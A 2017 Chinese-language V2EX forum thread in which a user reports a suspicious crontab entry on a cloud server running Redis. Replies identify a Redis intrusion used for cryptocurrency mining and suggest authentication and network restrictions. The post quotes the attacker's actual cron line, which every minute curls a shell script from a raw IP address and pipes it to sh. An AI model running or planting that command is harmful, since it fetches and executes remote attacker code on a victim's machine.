Home Sign Up Sign In
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
yolan
V2EX  ›  程序员

租的腾讯云主机安装 redis 后没几天, 发现多了一条记录, 是不是被入侵了...

  •   
  •   yolan · Jul 6, 2017 · 4811 views
    This topic created in 3258 days ago, the information mentioned may be changed or developed.

    */1 * * * * /usr/bin/curl -fsSL http://162.242.245.65:8220/test9.sh | sh

  • curl
  • Redis
  • usr
  • fssl
    12 replies    2017-07-07 02:30:42 +08:00
    weiweiwitch
        1
    weiweiwitch  
       Jul 6, 2017
    redis 启用密码了吗,没有启用的话,很容易被入侵。
    killerv
        2
    killerv  
       Jul 6, 2017
    redis 最好限制外网访问+启用认证
    expy
        3
    expy  
       Jul 6, 2017
    被挖矿了吧 233
    shakoon
        4
    shakoon  
       Jul 6, 2017
    是被入侵了,该机器被用作了挖矿的肉鸡
    yolan
        5
    yolan  
    OP
       Jul 6, 2017
    @expy #3 貌似是的, 下载了一个 minerd 程序..
    yolan
        6
    yolan  
    OP
       Jul 6, 2017
    @weiweiwitch #1 没设置...
    shakoon
        7
    shakoon  
       Jul 6, 2017   ❤️ 1
    解决可参考这个 http://www.centoscn.com/CentosBug/osbug/2016/0724/7671.html
    yolan
        8
    yolan  
    OP
       Jul 6, 2017
    @shakoon #7 好, 我看看
    evlos
        9
    evlos  
       Jul 6, 2017 via iPhone
    看一下那个人的挖矿账号累计挖到了 200 多 XMR,差不多一万多人民币
    Itanium
        10
    Itanium  
       Jul 6, 2017
    现在 CPU 挖矿效率很高吗?
    realpg
        11
    realpg  
    PRO
       Jul 6, 2017 via Android
    你一定是用了 centos
    msg7086
        12
    msg7086  
       Jul 7, 2017
    不要跟我说你 redis 给的权限能大到任意改写系统文件哦?
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   825 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 58ms · UTC 21:19 · PVG 05:19 · LAX 14:19 · JFK 17:19
    ♥ Do have faith in what you're doing.